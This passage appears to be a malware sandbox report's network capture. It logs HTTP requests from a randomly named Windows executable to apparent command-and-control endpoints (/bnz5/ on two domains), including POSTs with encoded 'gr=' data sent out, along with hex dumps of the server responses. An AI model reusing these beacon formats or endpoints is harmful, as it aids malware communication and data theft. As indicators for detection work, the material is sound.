                                                                                                      Data Ascii: gr=4hykkgCMPZlThXdiEXjvE5yduhbk4fGHXMWs7w14ZBYYRxQ17T9a9l5Wjrw+sKf3AznIBK2fTs7jK6SDeW62HYMiNuHr5yd9RU50ntfH4c1Ba3nN6GcNBHhIVswO2A82CH7VsbyTHZfadsEw27rkgMki1MSc22NzhcqAN2AFtalwx7i+TNnDPu7NLkmhKaJZ1glQ74sBaCmj0FfY11AUMNOW8Qq8u05eVdOTBKNPuFtFt+yICe538JwOdshE0rmPYnLUihb01XpMx5m7z0SajOfJ7ZXiM5eQKZYIi+rsC/nvHiWMSsFrbZ5wTUDgDXu1d5RANwRLXGRKoOsPtvncFBoHeOQatpo+xdhMhvimf2cnG0mQGtOdS9nikqvXmbTVL+V0d5N85tZrGzrzn+wcojhkC+Nrx6aAHyEIM1YYfScdsS2CkDJOcYTQawCcMTgq8msUTKa5978er6WS/96F8n9UE/Qq1DsRvpABoCOQNjvBofMJJpmk6oUaIjSwLvt7QIav6W6rhyjM2lI92yiGrB12g4XwirJKAroxZyuL5RlFFj1PG6t+5nWREtYSavQs9T1e4v0ph8a7+XBOn/vJcCF2EVqEqJiPo2LDBWBA99ojm2q+fRCw9kxb7CH7CC5xtCXwzH/oa01IaSLmVbZCRiyDf6MDquMESpbv04JYA73qoHC5AeoFG/2fjK06VGIYV05uIqnKr4UD4OjYLQi8VgG+OvrVI1OpgEAthe1XSoXEUT/7ugB4JJqyWTZCUylcb7HDBPJdCHa0Lq7J16IvmDyzJ/YjF0tHJfGQSZULKFeGy1AaOtU+8nX0s/txe5ZBRbkVkaPRQEeYWg7r6TSS7AukAhL6CdIyZEL/xubtd7MCCYumse5z6JuKGwXzTEBX+Gtj1+dY7vZ9kd131+T+j0QQICqTTHDs3CIRnRhwuzcjNdHgumfuno4P4Q4X6iiWq2aoWong8c3i61zNESa0qFCmRD2PyXyCJLNtR15NlMwFTvlVlKvUUUOaGJw/Q6Fq0eP+TgI8JBmuK6m7sjcoFxNtVWIi1CXrvBojWAiPPJrW4k1pG7hvWsqamxb4p4OB+IcQ8qrGRM6mucC1QoSjwYqVKQwqWbWhixu55eCZWX0CUt45H4KEu+KCqYyhdzhBWan/HRfsZHDevKgiM3qBKHeArhAVw0aOzacGAcfGnQaMAqtGCJwR1V8Y3KYhrFugEtv3GBXN+MY/J5VsOQ==
                                                                                                      Apr 16, 2024 12:01:42.938029051 CEST1289INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 16 Apr 2024 10:01:40 GMT
                                                                                                      Server: Apache
                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                      Link: <https://wedgetechflash.co.ke/wp-json/>; rel="https://api.w.org/"
                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                      X-Endurance-Cache-Level: 0
                                                                                                      X-nginx-cache: WordPress
                                                                                                      Connection: close
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 32 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 57 65 64 67 65 74 65 63 68 20 46 6c 61 73 68 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 57 65 64 67 65 74 65 63 68 20 46 6c 61 73 68 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 57 65 64 67 65 74 65 63 68 20 46 6c 61 73 68 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 65 64 67 65 74 65 63 68 66 6c 61 73 68 2e 63 6f 2e 6b 65 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 65 64 67 65 74 65 63 68 66 6c 61 73 68 2e 63 6f 2e 6b 65 2f 22 2c 22 6e 61 6d 65 22 3a 22 57 65 64 67 65 74 65 63 68 20 46 6c 61 73 68 22 2c 22 64 65 73 63 72 69
                                                                                                      Data Ascii: 4000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v22.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - Wedgetech Flash</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - Wedgetech Flash" /><meta property="og:site_name" content="Wedgetech Flash" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://wedgetechflash.co.ke/#website","url":"https://wedgetechflash.co.ke/","name":"Wedgetech Flash","descri
                                                                                                      Apr 16, 2024 12:01:42.938046932 CEST1289INData Raw: 70 74 69 6f 6e 22 3a 22 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 65 64 67 65 74 65 63 68 66 6c 61 73 68 2e 63 6f 2e 6b 65 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 7d 2c 22 70 6f 74 65 6e 74
                                                                                                      Data Ascii: ption":"","publisher":{"@id":"https://wedgetechflash.co.ke/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://wedgetechflash.co.ke/?s={search_term_string}"},"query-input":"required
                                                                                                      Apr 16, 2024 12:01:42.938056946 CEST1289INData Raw: 2f 77 65 64 67 65 74 65 63 68 66 6c 61 73 68 2e 63 6f 2e 6b 65 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65
                                                                                                      Data Ascii: /wedgetechflash.co.ke/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","sou
                                                                                                      Apr 16, 2024 12:01:42.938069105 CEST1289INData Raw: 62 5c 75 64 62 34 30 5c 75 64 63 37 66 22 29 3b 63 61 73 65 22 65 6d 6f 6a 69 22 3a 72 65 74 75 72 6e 21 6e 28 65 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32
                                                                                                      Data Ascii: b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElemen
                                                                                                      Apr 16, 2024 12:01:42.938079119 CEST1289INData Raw: 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65
                                                                                                      Data Ascii: wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t
                                                                                                      Apr 16, 2024 12:01:42.938088894 CEST1289INData Raw: 20 2e 61 6c 69 67 6e 77 69 64 65 2c 2e 61 73 74 2d 6e 6f 2d 73 69 64 65 62 61 72 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 61 6c 69 67 6e 77 69 64 65 20 2e 61 6c 69 67 6e 66 75 6c 6c 2c 2e 61 73 74 2d 6e 6f 2d 73 69 64 65 62 61 72 20 2e
                                                                                                      Data Ascii: .alignwide,.ast-no-sidebar .entry-content .alignwide .alignfull,.ast-no-sidebar .entry-content .alignwide .alignwide,.ast-no-sidebar .entry-content .wp-block-column .alignfull,.ast-no-sidebar .entry-content .wp-block-column .alignwide{width:
                                                                                                      Apr 16, 2024 12:01:42.938117027 CEST1289INData Raw: 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 34 70 78 20 73 6f 6c 69 64 20 23 35 35 35 64 36 36 3b 63 6f 6c 6f 72 3a 20 23 34 30 34 36 34 64 3b 7d 3a 72 6f 6f 74 7b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 78 6c 67 2d 70 61
                                                                                                      Data Ascii: der-bottom: 4px solid #555d66;color: #40464d;}:root{--ast-container-default-xlg-padding:6.67em;--ast-container-default-lg-padding:5.67em;--ast-container-default-slg-padding:4.34em;--ast-container-default-md-padding:3.34em;--ast-container-defau
                                                                                                      Apr 16, 2024 12:01:42.938127041 CEST1289INData Raw: 61 73 74 2d 61 72 74 69 63 6c 65 2d 70 6f 73 74 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 69 6e 6e 65 72 3a 68 6f 76 65 72 2c 2e 62 6c 6f 67 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 70 6f 73 74 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 69 6e 6e
                                                                                                      Data Ascii: ast-article-post .ast-article-inner:hover,.blog .ast-article-post .ast-article-inner:hover{overflow:hidden;}h1,.entry-content h1{font-size:40px;font-size:2.6666666666667rem;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2.133
                                                                                                      Apr 16, 2024 12:01:42.938163042 CEST1289INData Raw: 63 6b 62 6f 78 22 5d 3a 66 6f 63 75 73 3a 63 68 65 63 6b 65 64 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 61 6e 67 65 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 39 38 30 38 64
                                                                                                      Data Ascii: ckbox"]:focus:checked,input[type=range]::-webkit-slider-thumb{border-color:#79808d;background-color:#79808d;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#79808d;border-color:#79808d;}.single
                                                                                                      Apr 16, 2024 12:01:42.938174963 CEST1289INData Raw: 6d 2c 2e 61 73 74 2d 68 65 61 64 65 72 2d 73 65 61 72 63 68 20 2e 61 73 74 2d 73 65 61 72 63 68 2d 6d 65 6e 75 2d 69 63 6f 6e 2e 61 73 74 2d 64 72 6f 70 64 6f 77 6e 2d 61 63 74 69 76 65 20 2e 73 65 61 72 63 68 2d 66 69 65 6c 64 3a 66 6f 63 75 73
                                                                                                      Data Ascii: m,.ast-header-search .ast-search-menu-icon.ast-dropdown-active .search-field:focus{transition:all 0.2s;}.search-form input.search-field:focus{outline:none;}.widget-title,.widget .wp-block-heading{font-size:21px;font-size:1.4rem;color:var(--ast


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      36192.168.2.54975537.61.232.138802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:01:43.225009918 CEST456OUTGET /bnz5/?gr=1jaEnVPJQbBr8WwKNEfMHYGZjhye5aSOWdurwFccCTE0UU1/+EdJo2t+tokAsIL/Mwf8dbmtfOzyBKuFYSi0CvpWL7by1S5GZC5tkYq+xKghYmLhmWFfGXtgNdAY2BZgRg==&kFGTX=Q6OxIXo8tXD HTTP/1.1
                                                                                                      Host: www.wedgetechflash.co.ke
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:01:45.055211067 CEST608INHTTP/1.1 301 Moved Permanently
                                                                                                      Date: Tue, 16 Apr 2024 10:01:43 GMT
                                                                                                      Server: Apache
                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                      X-Redirect-By: WordPress
                                                                                                      Location: http://wedgetechflash.co.ke/bnz5/?gr=1jaEnVPJQbBr8WwKNEfMHYGZjhye5aSOWdurwFccCTE0UU1/+EdJo2t+tokAsIL/Mwf8dbmtfOzyBKuFYSi0CvpWL7by1S5GZC5tkYq+xKghYmLhmWFfGXtgNdAY2BZgRg==&kFGTX=Q6OxIXo8tXD
                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                      X-Endurance-Cache-Level: 0
                                                                                                      X-nginx-cache: WordPress
                                                                                                      Content-Length: 0
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      37192.168.2.549756103.66.94.182802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:01:51.360178947 CEST712OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.ojyphyi.website
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.ojyphyi.website
                                                                                                      Referer: http://www.ojyphyi.website/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 41 34 61 4c 64 68 71 6f 4f 6e 43 2b 57 54 66 43 68 51 57 33 58 4d 32 41 6c 6d 72 52 63 34 51 59 47 7a 6a 32 6a 39 51 71 78 67 35 6e 33 47 5a 49 65 56 44 4c 69 51 68 66 77 66 56 6e 56 39 6a 5a 6a 50 6e 53 4d 50 54 6d 6b 65 61 44 66 6a 57 70 36 63 45 4c 4e 68 44 30 31 4a 78 66 32 66 37 78 30 38 5a 4d 2f 6b 52 52 64 47 41 78 6b 76 68 42 4a 61 34 39 73 43 30 44 70 56 48 49 35 36 2f 65 46 56 66 45 6a 68 4e 5a 59 7a 51 6c 2b 31 53 7a 4d 6a 51 52 55 47 42 35 37 31 57 48 52 32 77 4e 67 6e 56 2f 4b 78 69 47 35 35 6f 34 31 74 4c 75 78 62 6a 71 42 56 50 5a 6b 6e 59 39 4e 37 48 38 66 33 74 65 30 34 51 3d
                                                                                                      Data Ascii: gr=A4aLdhqoOnC+WTfChQW3XM2AlmrRc4QYGzj2j9Qqxg5n3GZIeVDLiQhfwfVnV9jZjPnSMPTmkeaDfjWp6cELNhD01Jxf2f7x08ZM/kRRdGAxkvhBJa49sC0DpVHI56/eFVfEjhNZYzQl+1SzMjQRUGB571WHR2wNgnV/KxiG55o41tLuxbjqBVPZknY9N7H8f3te04Q=
                                                                                                      Apr 16, 2024 12:01:51.680154085 CEST257INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 16 Apr 2024 10:01:51 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      X-Request-Id: 44beef8136b1096c5a45bf1fb0196abc
                                                                                                      Content-Encoding: gzip
                                                                                                      Data Raw: 31 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cb cf ce 06 00 b3 5f a3 e0 03 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 17_0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      38192.168.2.549757103.66.94.182802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:01:54.171704054 CEST732OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.ojyphyi.website
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.ojyphyi.website
                                                                                                      Referer: http://www.ojyphyi.website/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 41 34 61 4c 64 68 71 6f 4f 6e 43 2b 45 69 76 43 67 33 43 33 66 4d 32 44 6f 32 72 52 58 59 51 6d 47 7a 76 32 6a 34 38 36 78 53 74 6e 32 6e 70 49 66 55 44 4c 76 77 68 66 37 2f 55 76 61 64 6a 53 6a 50 37 73 4d 4f 2f 6d 6b 61 79 44 66 68 65 70 39 72 77 4d 4e 78 44 79 39 70 78 52 70 76 37 78 30 38 5a 4d 2f 6b 46 72 64 47 59 78 6b 66 52 42 4b 37 34 79 6d 69 30 41 75 56 48 49 7a 71 2f 61 46 56 65 54 6a 67 67 30 59 78 59 6c 2b 30 69 7a 4d 79 51 53 4e 32 42 33 6d 6c 58 46 56 32 45 46 35 32 4a 6a 50 33 6e 4f 67 72 38 66 30 62 6d 45 72 35 72 43 53 31 6a 68 30 30 51 4b 63 4c 6d 56 46 55 39 75 71 76 47 73 65 35 46 6c 36 2b 47 55 50 63 74 36 39 32 56 42 31 5a 63 66
                                                                                                      Data Ascii: gr=A4aLdhqoOnC+EivCg3C3fM2Do2rRXYQmGzv2j486xStn2npIfUDLvwhf7/UvadjSjP7sMO/mkayDfhep9rwMNxDy9pxRpv7x08ZM/kFrdGYxkfRBK74ymi0AuVHIzq/aFVeTjgg0YxYl+0izMyQSN2B3mlXFV2EF52JjP3nOgr8f0bmEr5rCS1jh00QKcLmVFU9uqvGse5Fl6+GUPct692VB1Zcf
                                                                                                      Apr 16, 2024 12:01:54.465214968 CEST257INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 16 Apr 2024 10:01:54 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      X-Request-Id: a0b08fd9667ceac665eb92636895e129
                                                                                                      Content-Encoding: gzip
                                                                                                      Data Raw: 31 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cb cf ce 06 00 b3 5f a3 e0 03 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 17_0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      39192.168.2.549758103.66.94.182802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:01:57.018789053 CEST1749OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.ojyphyi.website
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.ojyphyi.website
                                                                                                      Referer: http://www.ojyphyi.website/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 41 34 61 4c 64 68 71 6f 4f 6e 43 2b 45 69 76 43 67 33 43 33 66 4d 32 44 6f 32 72 52 58 59 51 6d 47 7a 76 32 6a 34 38 36 78 53 56 6e 33 56 68 49 65 7a 58 4c 75 77 68 66 6e 50 55 75 61 64 6a 4c 6a 50 69 72 4d 50 44 51 6b 63 32 44 64 44 6d 70 34 65 63 4d 59 42 44 79 2f 70 78 63 32 66 36 73 30 38 49 45 2f 6b 56 72 64 47 59 78 6b 63 4a 42 64 36 34 79 31 79 30 44 70 56 47 61 35 36 2f 79 46 56 6d 44 6a 67 6b 43 5a 46 73 6c 2b 55 79 7a 4f 41 49 53 46 32 41 52 6c 6c 58 6e 56 32 5a 62 35 32 56 76 50 33 37 6b 67 70 73 66 35 65 6e 6a 32 6f 4b 62 4a 6e 50 79 38 58 63 58 63 76 53 30 4b 33 4e 47 76 4f 36 58 63 39 4e 6d 37 2b 32 75 61 4f 30 41 6b 67 35 4a 34 74 30 55 57 48 6f 6b 6d 6a 65 6c 6e 39 75 31 39 6e 30 6d 6b 66 47 5a 74 44 2f 2b 52 32 50 6b 58 50 71 56 58 4e 6b 59 7a 56 4b 39 78 62 6d 35 76 71 4e 41 51 4c 38 62 6e 37 63 70 74 53 30 6c 6b 62 59 45 41 49 4b 2b 39 75 53 4c 6c 36 74 74 66 50 58 70 78 52 7a 2b 4b 4a 58 48 44 39 6f 47 67 57 44 77 77 78 43 75 57 49 76 62 39 35 2b 69 47 6c 47 65 53 31 55 74 37 77 63 45 50 32 39 51 32 7a 4a 4f 36 57 54 67 43 43 75 4e 4d 67 76 76 6f 6a 57 4d 6b 64 57 48 30 63 48 38 6f 36 4a 70 66 7a 42 53 4a 6c 48 58 77 50 78 2f 45 56 48 52 65 4c 44 56 73 6a 70 4e 72 6e 79 66 57 33 39 46 7a 4f 54 77 72 53 32 6c 68 65 6f 2f 4a 78 75 57 4e 4e 38 67 74 43 68 6a 63 7a 65 71 34 4e 48 34 6a 7a 2f 61 4b 78 43 76 61 31 5a 4c 4e 57 76 52 75 45 39 6e 54 53 68 63 6f 54 6d 6d 35 72 46 50 59 31 44 57 58 4f 30 50 54 57 4c 39 4e 79 66 49 57 68 52 57 2f 35 6b 55 32 2b 32 70 57 4b 73 79 33 77 30 43 31 44 53 45 70 62 37 31 74 42 54 54 30 37 35 7a 71 37 53 45 54 4b 72 6b 39 43 30 74 4d 4b 52 77 32 33 50 2b 51 63 35 64 2b 69 71 4b 6c 78 51 50 68 33 30 61 34 48 62 47 62 54 4b 41 63 33 6a 7a 32 70 33 37 68 56 59 79 52 76 6c 4f 62 72 75 44 76 65 58 78 66 56 65 6b 4f 71 2b 66 75 2b 5a 2f 53 38 48 64 6b 6e 67 47 2b 6e 36 72 58 68 70 6a 57 48 57 75 36 57 36 50 73 7a 49 6f 31 61 2f 74 4b 6c 5a 75 49 32 64 4f 4a 4c 32 54 37 71 75 79 4d 6d 38 6f 68 4b 38 52 58 4c 6f 48 4a 73 6d 76 74 59 54 36 35 52 4b 35 74 49 30 50 31 41 6f 43 6d 68 69 4e 57 78 57 45 68 47 45 56 53 76 57 76 71 49 46 6b 32 34 6b 44 43 53 58 74 65 36 54 79 77 77 37 70 79 71 36 6a 41 71 62 2b 38 37 50 58 4d 66 70 53 63 41 39 75 65 67 34 52 4c 79 45 6e 64 4f 41 42 56 77 42 50 62 4d 38 43 4d 5a 6e 44 46 65 47 6a 34 77 61 49 4a 53 42 79 78 58 49 75 37 66 33 66 4d 49 52 42 72 50 30 72 6a 77 69 35 45 6b 62 70 38 4e 78 41 30 75 45 6e 4c 73 78 33 34 58 6e 7a 38 71 4e 56 2f 6a 39 35 6d 76 55 75 2b 64 74 53 72 65 79 48 50 33 33 6e 32 43 76 69 69 35 65 46 33 4f 62 6a 48 73 4d 30 75 4f 53 6d 39 2b 6c 4a 78 2b 6b 55 55 6b 69 46 31 62 63 39 68 53 48 77 35 36 39 4f 70 61 4e 61 33 33 50 32 58 5a 78 5a 36 4a 34 66 30 76 37 45 4c 33 4d 65 43 51 69 76 34 7a 31 72 56 74 4b 45 2f 71 55 76 6f 35 69 44 4f 6e 75 67 4a 64 64 62 65 4c 47 41 74 71 51 4d 6b 6c 71 71 31 37 38 51 79 30 74 41 7a 2f 52 68 73 36 4d 6e 58 38 6c 4b 66 35 68 30 54 4c 5a 62 42 65 37 6d 63 30 43 2f 34 6a 44 74 78 49 31 34 72 79 43 44 2f 32 46 4b 50 34 5a 2b 6f 41 68 6c 4d 54 62 6f 5a 30 72 73 75 5a 7a 66 42 4f 66 46 62 53 4d 71 65 35 73 48 4c 30 42 7a 39 65 7a 73 70 4e 35 74 49 37 73 55 2f 5a 57 59 71 6c 62 6b 30 30 59 42 4f 67 35 37 44 64 65 46 64 77 47 45 75 43 54 63 63 65 6b 39 42 73 74 45 70 4c 73 69 7a 74 2b 72 4d 4d 47 37 46 44 4d 4d 44 75 62 76 61 42 62 4c 42 7a 2b 51 71 78 50 6b 72 6f 48 4b 4c 61 76 72 66 71 61 4f 39 46 2f 73 39 73 4e 4c 2b 57 2b 38 68 53 52 2f 2f 6a 30 34 5a 2f 62 52 41 33 72 35 6a 4f 55 4e 77 6e 50 49 56 4b 4a 45 58 41 32 32 4c 50 37 62 68 56 6d 37 57 4e 50 6f 73 30 4a 71 4c 2b 49 46 45 78 56 73 30 70 51 64 4f 70 52 6e 57 61 74 53 58 51 73 43 65 36 49 74 71 54 76 52 4f 45 30 31 7a 66 31 63 69 30 69 6e 46 41 3d 3d
